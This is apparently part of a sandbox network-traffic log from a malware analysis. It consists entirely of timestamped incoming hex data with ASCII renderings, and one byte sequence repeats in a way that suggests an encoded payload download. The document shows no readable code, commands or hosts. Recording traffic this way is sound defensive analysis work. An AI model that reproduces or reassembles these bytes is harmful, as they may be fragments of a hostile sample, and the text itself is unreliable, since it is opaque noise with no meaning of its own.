2021-11-25 15:51:58 UTC	1141	IN	Data Raw: 89 f8 2e 31 bd 44 ef e7 eb cc 9b e1 90 46 8c 7d ee 74 86 5e a9 76 66 b5 6e 94 31 b7 6b 69 64 d7 36 0a 8f b3 7e 6a 92 38 05 69 64 d7 77 c6 a3 90 2a 34 2b ba c3 45 0a f6 37 86 44 c4 ad 6a 8f 94 3f af 76 70 8c 7e 71 0c 97 a2 3e 78 09 74 9a 2b b0 d4 99 a8 ee 44 ca b8 fe 2b a8 ea 64 b2 ff b2 cc dc 04 e7 9f 92 39 89 c1 11 e4 79 f9 b8 d8 93 9b e1 90 46 8c 48 ff be d4 95 a0 0d 10 4c ff be d2 88 5e a4 0a 93 b9 42 cb 59 3c 73 7d e2 7d f3 d0 83 d7 14 6a a2 17 f2 50 c6 a2 1f d9 19 e8 4c d2 eb a9 04 e7 fb 98 3e 19 f9 be d1 3c 07 00 b8 d8 88 44 c4 bc d1 2f d3 6d 6e f0 58 d6 9c 17 e5 ff 8d ca b2 dc 04 e7 9f 99 b9 58 d7 02 8d fd b3 7e 76 65 37 95 bd 50 d7 12 5a c7 3d 93 b8 fb d1 68 e1 90 32 34 2a 29 87 c4 ab 60 99 a8 e7 d8 fa 4f 23 b5 41 6f 1f c7 0e 6c 8a 54 c0 f2 3b f1 Data Ascii: .1DF}t^vfn1kid6~j8idw4+E7Dj?vp~q>xt+D+d9yFHL^BY<s}}jPL><D/mnXX~ve7PZ=h24)`O#AolT;
2021-11-25 15:51:58 UTC	1145	IN	Data Raw: 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be 79 8c 3c 73 85 aa 87 af ef b3 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 1a 9f 9c 2c b4 47 d6 67 a0 9a bc 10 ae 66 31 63 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 32 5a be b9 f3 31 a1 cf 9c d7 d3 33 22 f8 f1 c0 41 eb 48 34 f0 88 88 a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 0b e4 85 37 6b 08 90 27 77 ec 40 13 39 99 a4 02 bb ac 2e f4 43 6a 90 39 4c a2 58 a1 0f 32 d1 09 8b 14 9e 0b 86 8a a6 29 3b 2d 03 ef fa 10 53 1e 28 41 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d 18 42 d9 20 d2 d5 4d 5e 37 bf 61 0c 04 94 23 c7 b0 17 e8 5d 17 25 03 d9 83 16 99 b4 5f Data Ascii: ,Kdwy<s}U2Z,Kdw,Kdw,Ggf1cU2Z,Kdw,Kdw,Kdw2Z13"AH47k'w@9.Cj9LX2);-S(A,KdwB M^7a#]%_
2021-11-25 15:51:58 UTC	1150	IN	Data Raw: be b9 2c 4b 19 a3 f5 c2 c3 a2 23 88 2f 2c ca b1 21 4f 5e ae a7 00 5b 31 e3 6a 6a 9f d7 88 99 4a c1 bf f0 8d c7 b0 49 db 14 f0 c9 ae 53 73 2a 16 23 b5 22 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 ac 1d 37 76 ae ca 8c 67 b7 44 e4 7b 6a 8e 29 ac 7a 7e 68 91 15 ef ce 9c fe d1 e0 87 97 73 d9 d8 fa 4f 23 b5 22 32 5a be f9 c5 40 7a e8 42 c8 fe a6 c2 58 ca 28 87 0b 05 96 e4 8c 55 cd cf 1b e3 6a 69 1f 96 aa 21 26 69 9b 3c bb b2 5c 5c 51 74 fc 49 0e 0c fb d1 68 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d 86 b0 0a 6a 19 d9 39 a9 fb 97 91 8e be ef e5 cc 23 d5 12 6b 96 3c 19 f0 c9 20 5a c9 ab 77 f9 4d e1 15 Data Ascii: ,K#/,!O^[1jjJISs*#"2Z,Kdw,Kdw,Kdw,K7vgD{j)z~hsO#"2Z@zBX(Uji!&i<\\QtIhF<s}U2Z,Kdw,Kdwj9#k< ZwM
2021-11-25 15:51:58 UTC	1154	IN	Data Raw: 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 8d 50 52 aa 6a 08 1f ab f6 b0 4e a0 97 25 6b 69 9b 0d b5 22 cd bf 82 22 c6 2e f4 40 96 b4 05 69 9b 38 dd 86 dd 41 a0 6e 17 4e 32 5a 55 f1 24 37 35 2c f3 bd ea ea ac 8c d8 42 17 97 35 55 b9 2c ab a6 f8 4a 51 9b 43 05 b0 24 bc b4 7d 24 b0 96 82 8e c2 c3 97 7f 1f ab c2 7d 00 dd 45 bd a6 7d 56 07 fa 4f 9b 3d 0d 7e ad df 71 78 b1 de ea 27 0d b1 f5 c2 63 9b 1d a6 df 43 f5 c2 6f b8 40 7d 37 24 d4 f0 ad c5 b1 18 86 e5 6e f0 af db 76 04 7e d8 1c 23 24 f6 a9 04 51 f4 ce e1 3d 37 74 ff 7f 24 e9 a4 d8 42 5b 41 91 75 65 5a 35 5f b3 1d 2a fd 23 b5 af a4 9a 5f d3 d7 a9 04 7e a2 ab 09 e0 a7 3d f6 c1 ed 76 04 66 71 a2 73 ff 71 ab 09 fc ff 15 92 c7 e8 e4 18 99 7d 56 b4 08 59 94 50 19 2f Data Ascii: Kdw,Kdw,KPRjN%ki"".@i8AnN2ZU$75,B5U,JQC$}$}E}VO=~qx'cCo@}7$nv~#$Q=7t$B[AueZ5_*#_~=vfqsq}VYP/
2021-11-25 15:51:58 UTC	1158	IN	Data Raw: 50 16 4b 19 1e 81 fb d1 f5 56 c9 54 39 65 3f fb 5b d8 81 a0 e1 12 79 8c b2 19 f3 bd a6 f8 13 8d 25 32 12 0a 71 ed fc 54 68 9f cc dc a7 84 72 fa e8 58 fd d6 64 ab 63 55 b1 67 28 41 89 c1 20 2d 56 cc 8f c3 d6 86 6b 69 f7 a9 4d 1e a5 81 fc 54 26 48 cd 5e 4e dd da ff 5d 31 92 4b 9a 37 b7 27 33 b7 65 5a 32 3c 32 5a 3a 0a b2 9b 59 44 aa 87 0d 12 38 69 f6 30 6a e6 8d d9 43 05 e2 66 e0 0e 8b d9 49 14 8e 27 85 aa 15 cd 63 55 b3 41 39 ec af 48 a2 73 f8 1c 0b 79 f3 14 d6 f5 be 11 5d 46 f6 e1 41 00 a7 5d 8f c3 3f 5a 7d 96 2c d5 b7 27 cb c5 8b b9 55 97 6a e6 6c 7f 20 2d bd a3 42 82 53 a6 de 09 1a 8e fb d1 06 7c a5 fa 27 31 6d 6e 9e e1 32 5a d8 7c bf 3b 83 20 b6 a5 8e c2 50 a5 85 22 be b9 41 85 34 5f 27 3d 60 cd 26 99 87 af 68 41 47 0f f5 5e b4 a0 14 9a 35 e2 6a 6e 84 Data Ascii: PKVT9e?[y%2qThrXdcUg(A -VkiMT&H^N]1K7'3eZ2<2Z:YD8i0jCfI'cUA9Hsy]FA]?Z},'Ujl -BS\|'1mn2Z\|; P"A4_'=`&hAG^5jn
2021-11-25 15:51:58 UTC	1162	IN	Data Raw: 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 44 c7 4f 23 95 e5 9a 5f 6b 7f 9b e1 b0 d6 f5 c2 e3 85 aa 87 b0 62 d2 eb 88 01 5f 4b 06 02 e2 13 92 eb a9 04 c7 37 e7 9f f4 c1 40 7d 89 d0 e6 1d 87 8b b9 2c 54 f4 40 7d 88 c9 54 af 32 4e a0 6e ee 80 1d a6 63 65 5a be 98 56 b4 a0 70 d2 eb a9 19 64 d7 77 a7 07 6e f0 2b 3b f1 b8 b6 d5 72 fa 6f 9f eb a9 18 7e 18 19 87 d7 77 87 8f 17 97 d7 6c 99 dc 04 fd 22 32 5a 9e a5 fa 4f 39 01 5f 4b 00 11 88 31 f8 8a 37 e7 86 ef b3 1d bf 2b c9 54 8e 65 5a be a0 67 5f 4b 01 9b e1 90 66 7c 13 8d a6 c0 be b9 34 37 e7 9f cb d9 7c 13 95 ef b3 1d b1 e4 18 19 bc cc dc 04 f0 7e 18 19 8b 89 b4 a0 4e d8 fa Data Ascii: ,Kdw,Kdw,Kdw,Kdw,KDO#_kb_K7@},T@}T2NnceZVpdwn+;ro~wl"2ZO9_K17+TeZg_Kf\|47\|~N
2021-11-25 15:51:58 UTC	1166	IN	Data Raw: 0f f3 99 98 d3 25 ba af 05 08 f4 cb 11 e0 2a 02 6b 21 b0 96 43 60 c8 59 74 ff db 81 a1 f0 36 72 3a 6b ae 51 28 45 03 64 d7 61 96 50 62 d2 eb be 49 11 01 17 97 d7 77 17 b3 99 57 7f 9b e1 86 c3 40 f4 08 f1 b8 b2 e5 9f 60 85 aa 87 b7 02 e7 16 5c cb 99 5f 03 64 d7 77 0f a7 7b 1c 6b 69 64 cf fb d4 79 c4 c8 d2 eb 21 94 d4 7b d9 5e 23 b5 22 36 eb 41 c9 67 3f df df 00 95 8a 13 c9 df c7 1f 8f 8f 48 dd a6 59 78 80 55 32 5a a9 c8 d7 fa 07 46 a8 c6 44 cf 23 91 8c b1 50 95 f6 01 d6 bd 7e 3c 37 6a ae 91 c8 d2 eb 91 ec 68 26 74 be cd 5e 98 7e 64 54 e7 cf 47 4b 90 0e 00 dd 82 c5 a2 2b ed e2 98 12 6a c2 97 5a f6 85 99 99 84 03 38 e0 42 82 22 2b c5 57 bc f8 b5 dd 71 bb 24 c8 d2 eb b1 39 e1 1d ee 31 d8 fa c7 a3 74 b7 2f f7 8b 30 1d 6a 2a 8a fb 1d 6a 2a 8a fb 12 55 12 ce 62 Data Ascii: %k!C`Yt6r:kQ(EdaPbIwW@`\_dw{kidy!{^#"6Ag?HYxU2ZFD#P~<7jh&t^~dTGK+jZ8B"+Wq$91t/0jj*Ub
2021-11-25 15:51:58 UTC	1170	IN	Data Raw: 2c 4b 19 9c 64 d7 d7 77 87 af 13 81 a0 6e 80 1d 02 c2 67 47 ab 09 d7 8f 60 3d 55 da 5c 23 16 c4 6b a1 50 15 32 ca 77 0f 23 35 42 ea 87 a7 5f 4b 19 9c 64 ff db 81 f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 Data Ascii: ,KdwngG`=U\#kP2w#5B_Kd6dw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw
2021-11-25 15:51:58 UTC	1173	IN	Data Raw: 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 c2 ce e6 1d 59 9d 61 1c dc ab 90 1e d7 df 13 d5 8d 04 4d 76 fb 03 a1 8e be 66 0d e5 7b 4f f9 7c 01 40 61 41 00 dd 86 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 80 92 c4 47 8b e6 42 dd 32 2e 24 43 b3 6b 1f dd 10 78 74 82 68 78 90 df 8b b9 2c 4b 08 a6 26 63 ce c0 a6 75 7d 18 76 4d e1 3e f6 21 4f ba d0 ab f6 ca ae aa 78 a3 6d 38 96 88 f9 4f 55 55 6c d0 e6 1d a6 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 c9 c8 4e 3c 96 05 39 bc 4b 54 e3 d9 83 fc 0e 5c 3c 17 f0 5f b4 d3 1a 67 a7 84 59 bd f6 e2 b8 07 60 5f dc 9f d8 b6 e0 4e 57 86 a5 99 23 46 45 ae 6e 09 af ad f1 56 6b a9 fb 1f 1d 37 18 b2 0f d3 aa 24 a3 af 16 42 c9 7f 9b e1 90 46 Data Ascii: dw,KdwYaMvf{O\|@aA,Kdw,Kdw,KGB2.$Ckxthx,K&cu}vM>!Oxm8OUUl}U2Z,Kdw,KdN<9KT\<_gY`_NW#FEnVk7$BF
2021-11-25 15:51:58 UTC	1177	IN	Data Raw: 11 da 00 7d e5 d4 39 76 70 a6 21 c3 c1 13 15 c7 36 5a 52 e7 ef 86 d3 3a 10 40 82 b2 1e 71 87 03 e5 c0 41 bd bf 5d b9 89 38 0a 09 00 4a c2 3c e1 52 c5 b7 84 ea 5b ce 8f 44 d3 6e c9 1c 08 f1 b8 aa 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 f4 68 c0 a7 01 26 6c cc 23 cf 32 73 82 a5 99 9c 9b 6d 08 b0 69 ea 4f 62 2d 5e af 2c b4 32 05 54 78 8a 43 4c 7b e9 07 35 1d 26 97 8d 41 66 56 f2 c4 92 3c 3a 91 51 53 7c ec 83 d9 35 1d 09 08 b3 e2 a3 75 c3 ba 07 ff 91 37 42 29 9b 1e 81 6f f1 47 cf 86 bb b0 fe 26 6c eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb a9 04 e7 9f eb e7 d1 00 59 80 4a cc 8b 46 00 81 8e be ca 9c 45 f5 b3 51 0f 7c 92 17 af ec ad 54 9b 16 Data Ascii: }9vp!6ZR:@qA]8J<R[Dn,Kdw,Kdw,Kdh&l#2smiOb-^,2TxCL{5&AfV<:QS\|5u7B)oG&lYJFEQ\|T
2021-11-25 15:51:58 UTC	1189	IN	Data Raw: af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 49 44 87 af 53 83 a5 fa 0f d3 6d 6e aa ab 09 74 bf 71 78 09 34 6f 73 7d ca e7 9f eb e9 84 27 bf 7b 91 c8 d2 b7 17 97 d7 48 63 55 32 65 8d be b9 70 c5 4a 96 6a 37 e7 9f d4 43 05 69 38 a1 f0 36 5b ec 2c 4b 26 5c c3 45 56 0c fb d1 57 75 82 22 0d 3e 78 09 28 fd d6 f5 fd c1 40 7d a8 3e 78 09 2e 7c 13 8d 80 a8 82 22 0c 63 55 32 06 44 87 af 2d f6 45 0a cb 3d f6 45 56 30 55 32 67 42 82 22 0e d0 e6 1d fd 92 4b 19 a0 33 dd 86 10 1d a6 7d ca b3 1d a6 41 10 Data Ascii: ,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,KdwIDSmntqx4os}'{HcU2epJj7Ci86[,K&\EVWu">x(@}>x.\|"cU2D-E=EV0U2gB"K3}A
2021-11-25 15:51:58 UTC	1193	IN	Data Raw: 44 a9 04 e7 99 f8 4a 96 35 72 fa 4f 23 b5 16 30 34 2b a8 e6 74 d1 68 e1 92 fb d1 68 bc 54 af 13 8d be 8a 13 ec 58 d8 9e 00 f3 bd 36 64 cf 63 55 6f bb 31 d8 fa 4f 11 ac ed da 9e 0d 17 b9 2c 4b 19 6c eb a9 58 61 50 a5 9b 95 b3 79 f4 6e f0 36 66 34 5f 4b 40 8d be b9 2c 2c 29 a0 14 75 f8 6e 91 bc d5 16 66 f2 3b f1 ba 33 dd 86 7b c5 4a 96 34 2b a8 e6 6f 5d 46 8c 3e bc b4 a0 3a fe 59 3c 00 a9 65 33 ba 81 a0 6e f0 3a 6e f0 62 56 b4 a0 1d c2 aa e1 f7 e9 a4 78 09 20 2d ce b5 12 0a f6 45 0a ac c5 12 2e 04 b5 61 7e 18 19 9c 6c eb a9 50 8d be b9 2c 4b 40 34 07 4a c2 91 8b 97 d7 77 87 a7 ff db d5 52 aa 87 af 52 eb e0 56 90 12 58 fa 61 50 a5 fa 47 0f 83 f1 a0 6e f0 36 64 96 1c 7b b5 76 56 f7 e9 a4 78 09 7c 13 8d ea 37 e7 9f eb a9 5e 8b e1 b4 f4 12 49 3a 6e f0 36 6c eb Data Ascii: DJ5rO#04+thhTX6dcUo1O,KlXaPyn6f4_K@,,)unf;3{J4+o]F>:Y<e3n:nbVx -E.a~lP,K@4JwRRVXaPGn6d{vVx\|7^I:n6l
2021-11-25 15:51:58 UTC	1209	IN	Data Raw: 1e 77 87 c1 2f ba db e2 76 57 5b 20 4e c9 20 44 f5 81 c5 3e 1d ca b2 df 8b c3 1a 77 ff 84 78 27 cd 2a 36 02 87 dd a8 82 43 5a dd fe 06 b3 33 af 67 2f b5 47 7d b8 aa e2 70 87 c0 d8 a5 8e 2e 22 56 c7 3b 9d 92 22 5c aa d8 8d d9 12 63 38 69 07 0b 01 1a 70 9c 33 82 52 c7 26 63 0a f6 2e 33 b2 f7 a9 71 27 e0 7e 75 eb f6 1a 1e 77 d8 94 3f 92 38 1b c4 be e6 78 6e 91 a5 93 92 39 83 cb 30 38 36 3b f1 e7 c0 d0 89 dd f5 b0 f3 cb 06 81 c5 3e 0b 00 ae f3 c8 a1 af 61 3f 95 bb 5c 9c 3b f1 dc 6a 83 fa 3c 10 6a 8a 52 d8 89 c4 97 a3 87 f0 69 64 b3 54 cb 38 0c 89 dc 50 d1 06 89 c6 bf 4e e3 e1 f5 85 aa e9 cb 2a 27 da 8d e1 fe 30 34 32 36 08 95 8d db f7 ae e5 fb bf 64 88 1f d9 08 81 c6 a8 f0 18 19 f7 a4 17 fb 8e 31 ad 7a 7c 72 8e 32 05 0c 8d d7 03 05 07 31 87 af 60 a0 31 b3 69 Data Ascii: w/vW[ N D>wx'6CZ3g/G}p."V;"\c8ip3R&c.3q'~uw?8xn9086;>a?\;j<jRidT8PN'0426d1z\|r21`1i
2021-11-25 15:51:58 UTC	1221	IN	Data Raw: de 68 95 b3 79 e5 b4 a0 6d 6e f0 36 62 d2 eb a0 2e 50 a5 fa 4f 50 d6 97 f9 cc df 8b b9 2c 49 14 0f 83 95 d2 eb a9 65 2e 31 bc 9a 5f 48 91 c8 d2 ea 27 bf 22 02 e2 13 8d ca af 76 70 db 81 a3 f5 c2 c3 4d 1e 28 45 da c9 70 94 24 56 d0 8f ed ae 92 4b 19 9c 6c eb a9 04 13 b9 08 90 32 3b 95 bb 1f ab 0a f6 45 0a fe 59 3c 71 34 6a c2 a2 07 0f e7 f6 6b 69 67 5f 4b 19 94 50 a5 ff 37 d0 c2 a2 07 0f e7 f6 6b 69 67 5f 4b 19 9a 5f 4b 10 45 0a f6 45 0a 85 d9 1e 06 ec 2f d3 6d 6e f2 3b f1 b8 9a 5f 4b 19 fd a2 12 6e de 09 77 87 af 13 8c 3c 73 64 ff db 81 a0 1a 66 b9 58 97 d7 74 ff db 81 a8 82 22 36 0c cd 7a 6f 07 0f e7 f6 6b 69 67 5f 4b 19 94 50 a5 fa 8b 8d 9a 3e 0c 9a 3b 98 74 ff d8 fa 4f 23 bd 36 64 d5 6e c5 6e 91 bc d5 16 7d b8 aa 84 27 bf 3b f9 cc dc 01 8b 8e 65 3b 85 Data Ascii: hymn6b.POP,Ie.1_H'"vpM(Ep$VKl2;EY<q4jkig_KP7kig_K_KEE/mn;_Knw<sdfXt"6zokig_KP>;tO#6dnn}';e;
2021-11-25 15:51:58 UTC	1237	IN	Data Raw: a0 6e f0 36 65 ee ae c0 bf c8 d2 ef b3 1d a6 7d 96 55 33 69 64 d7 77 87 af 13 8c 96 04 e7 9e 69 64 d7 77 87 af 12 a0 6e f0 36 64 d7 77 86 bc b4 a0 6e f0 36 64 d7 77 87 af 13 8d be b9 2c 4b 86 7e 19 6f 73 79 8c 3c 73 7d 96 55 30 72 fa 4f 23 b5 22 32 58 9d b4 a0 6f 73 7d 96 55 32 5a bc 90 46 8c 3c 73 7d 96 57 20 b2 c9 55 c1 40 79 8c 3c 73 7d 96 55 30 42 82 22 32 5a be b9 2e 44 d5 72 fb d1 68 e1 90 46 8c 3e 6c eb a9 04 e7 9f eb ab 06 73 2f d2 18 19 98 5a be b9 2c 4b 19 9e 66 dc 04 e7 9f eb a9 06 eb fb d1 69 64 d7 77 87 af 13 8f c4 c8 d2 eb a9 04 e7 9d e6 82 70 f4 b3 1d a2 73 7d 96 55 32 5a bc b4 a0 6e f0 36 64 d7 76 e8 70 f5 c3 45 0a f6 45 0a f6 44 6b 69 64 d7 77 87 af 12 e8 bd 64 d6 06 ec 28 41 00 dd 86 2c 4b 18 fb d1 68 e1 90 46 8c 3d 48 c3 45 0b 79 8c 3c Data Ascii: n6e}U3idwidwn6dwn6dw,K~osy<s}U0rO#"2Xos}U2ZF<s}W U@y<s}U0B"2Z.DrhF>ls/Z,Kfidwps}U2Zn6dvpEEDkidwd(A,KhF=HEy<
2021-11-25 15:51:58 UTC	1253	IN	Data Raw: ae a7 88 1c 54 c8 bc dd eb 86 4f 51 5b 6e 86 49 70 86 5f 24 45 69 4b 23 f6 44 87 af 12 0a f6 45 0b 78 08 f0 36 69 6a 1d a7 fe 59 3c 73 29 c4 ca d7 77 87 c1 40 7d 96 54 af 70 db f5 b1 71 14 22 51 47 63 30 27 92 24 53 58 dc 77 f7 c7 4f 57 45 69 4b 6d 1c 40 50 91 fe 2e 7d e1 f7 a9 6d 03 4b 6d 07 09 59 0f f5 ef 87 99 ab 24 40 1a 70 9c 09 5b 22 40 0e 2f a5 9f 8f b0 e5 f5 b0 f5 ed 94 13 8c 3c 73 7c 13 8d be b8 ab 08 f0 36 69 6a 1d a7 fe 59 3c 73 20 2d cc dc 04 e7 fc 55 33 dd 8a 35 cc c0 bd 24 3f 9f e8 4e eb de 0f f7 c1 41 04 e5 9a 15 e8 21 8d 90 4e aa 84 7b 58 f4 35 ae dc cc d4 93 ce 95 d3 aa 84 09 0a 28 42 ac fb d2 9f ea 8c 3f 79 f2 e5 99 38 64 d4 84 5d 45 89 ee 68 dc 3f c6 81 ea 2f aa 84 53 2c d0 e5 b4 de e2 10 71 79 19 9f 8d c0 4c 98 7c 1b c6 d2 e3 e1 91 40 Data Ascii: TOQ[nIp_$EiK#DEx6ijY<s)w@}Tpq"QGc0'$SXwOWEiKm@P.}mKmY$@p["@/<s\|6ijY<s -U35$?NA!N{X5(B?y8d]Eh?/S,qyL\|@
2021-11-25 15:51:58 UTC	1269	IN	Data Raw: a9 4b 50 f1 fb 94 03 3b bd 77 c4 81 f4 09 26 7f c4 84 73 2f 8c 3a 6e de 09 74 fe 02 ff 86 29 c4 8c 6e bf 6c 8e 33 bc c4 9b e6 31 d8 fa 4e fb cc 80 18 19 f4 27 d6 bd 4e c5 2e 3e 31 bd 55 53 5f 1f c0 dd e7 dd f4 2f a7 9e 0c 89 f7 c0 96 55 32 5b 26 21 eb ac 8c 4f 44 e6 71 3e 7f bf 3b f1 b9 4b 04 bd 33 dd f2 55 47 60 8e 2f bc dd f2 55 57 43 6b 06 af 14 2f d3 6d 6f 14 12 53 28 41 74 91 bd 59 7f e2 61 24 59 79 8b a9 04 e7 9d e8 3f a3 f0 36 10 76 6d 22 41 6b 0a 99 90 35 91 ad 6d 01 2d 9e 6e f8 4a 96 56 64 ca 80 18 19 f2 54 c6 b9 4f 46 df e7 fe 3a 07 1a 77 f5 81 a7 fd d6 f5 c3 1e 35 b4 a5 fa 37 82 46 e2 5a db e2 72 88 65 31 bb 50 e7 ed c1 34 3e 1d d4 b3 1a 1e 28 41 01 04 fa 1a 1b a1 95 a2 0a a2 74 ff db 82 10 18 4d 1b 91 c8 95 87 ed eb ed f1 f6 0a bf 6f 30 10 56 Data Ascii: KP;w&s/:nt)nl31N'N.>1US_/U2[&!ODq>;K3UG`/UWCk/moS(AtYa$Yy?6vm"Ak5m-nJVdTOF:w57FZre1P4>(AtMo0V
2021-11-25 15:51:58 UTC	1285	IN	Data Raw: dd 86 d5 74 ff db 80 42 87 af 13 8c 68 e9 a0 6e 82 43 6d 0d 5e ac e9 ca b0 ff a8 ec 59 34 5e ca d7 03 0a 9f cb 3d 93 a3 92 22 41 6e 85 8a 50 cb 36 08 f6 41 02 e2 76 74 86 58 dc 7e 71 0b 7e 10 07 6e 84 49 7d b6 c1 25 d4 97 be ca b9 59 3b f5 c0 be cd 30 3c 53 4a f8 25 d6 f0 32 58 b9 58 d7 1e 2d ca d5 72 8e 2f ba 8f a7 9a 31 bf 52 d9 12 7f bb 45 78 66 b4 d3 6a e4 1a 1e 5c ad 67 7f fc 3a 01 33 fd b1 76 6b 05 6c e3 97 d7 03 0a 9f cb 3d 93 a3 92 22 41 6e 85 8a 50 cb 36 08 d1 0f ed c1 2c 4c 93 cf 63 55 32 e2 30 56 b4 d4 af 76 7e 71 0b 7a 0e 72 9b 89 d7 71 79 8e 41 00 d5 46 8c 3c 73 7d 96 55 36 3c 73 7d 96 55 53 11 94 d0 e6 7e 36 16 71 14 6b 07 0f eb f6 31 aa e4 37 93 bf 58 96 21 c2 a0 43 31 ee 46 a1 87 c8 bc dd eb 86 58 d0 81 8d 8d c8 ff ef 85 dd ab 7e 7f f5 ab Data Ascii: tBhnCm^Y4^="AnP6AvtX~q~nI}%Y;0<SJ%2XX-r/1RExfj\g:3vkl="AnP6,LcU20Vv~qzrqyAF<s}U6<s}US~6qk17X!C1FX~
2021-11-25 15:51:58 UTC	1301	IN	Data Raw: d8 be b3 19 3c 73 7d 93 bf 3d 37 e4 18 75 ed dc 70 9b 8e 02 90 29 b0 f5 a7 a9 0e 03 64 d7 77 8e ce e7 5f 48 91 ba ca a3 86 45 6d 0b 2b bb 5e bc d7 12 5c c9 55 32 5a be b0 cb 50 5d 46 8c 39 9e 6f d4 f3 bd 46 e5 c8 d4 00 dd 86 29 b6 a3 53 2e 50 90 77 d5 74 17 97 d7 72 88 37 42 81 a0 5a 8f 91 ce 01 5f 4b 1c 51 2e f4 43 05 5a 8f 91 ce 39 ec 2c 4e d2 ed 0d 7d 96 67 6e a2 75 52 aa 87 aa f5 c4 6a e5 9a 6e c1 12 0c 33 dd 86 29 b6 a3 54 ac 8c 0c ca 85 ac 4c 9b e1 95 a0 68 41 03 64 ee 63 53 95 d2 eb ac fe 5f d4 f3 bd 0e 52 ac 3c 73 7d 93 bf 3d 68 e2 13 e4 7c 41 06 44 87 af 16 66 da 62 d1 68 88 42 d0 e0 ae 91 c8 d7 05 6f ef b0 96 25 d8 a8 84 bf 3b f1 bd 44 81 3b f2 3b 81 d3 3f fd 46 8c 3c 76 76 02 78 0a f6 3d 94 02 e4 90 46 8c 39 9e 6f ea 24 37 9f 8f 91 ce 61 50 a5 Data Ascii: <s}=7up)dw_HEm+^\U2ZP]F9oF)S.Pwtr7BZ_KQ.CZ9,N}gnuRjn3)TLhAdcS_R<s}=h\|ADfbhBo%;D;;?F<vvx=F9o$7aP
2021-11-25 15:51:58 UTC	1317	IN	Data Raw: 96 54 b0 18 16 d4 75 82 22 6d fa 4a 1d dc 71 bd bf 76 c8 5b 08 23 30 7d 7a 8d f6 16 42 d5 27 eb e8 77 c6 cd 41 0f 40 26 1c e7 1c 6b 69 64 d7 76 bc 77 dc 24 f3 3e 30 55 32 5a be ba 68 a9 c4 f9 c3 31 da 76 4c 9b e1 a1 12 1f 20 65 58 30 1d 7d 13 c5 4a 96 64 08 e4 93 85 aa 87 ab df 63 96 dc 4c 5a 37 af 13 8d a6 fc bc b4 a0 6f 73 c4 e8 ce 62 9a 0c fb d1 68 e1 90 46 8c 3c 73 7d 96 55 32 5a be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 87 af 13 8d be b9 2c 4b 19 9c 64 d7 77 Data Ascii: Tu"mJqv[#0}zB'wA@&kidvw$>0U2Zh1vL eX0}JdcLZ7osbhF<s}U2Z,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw,Kdw
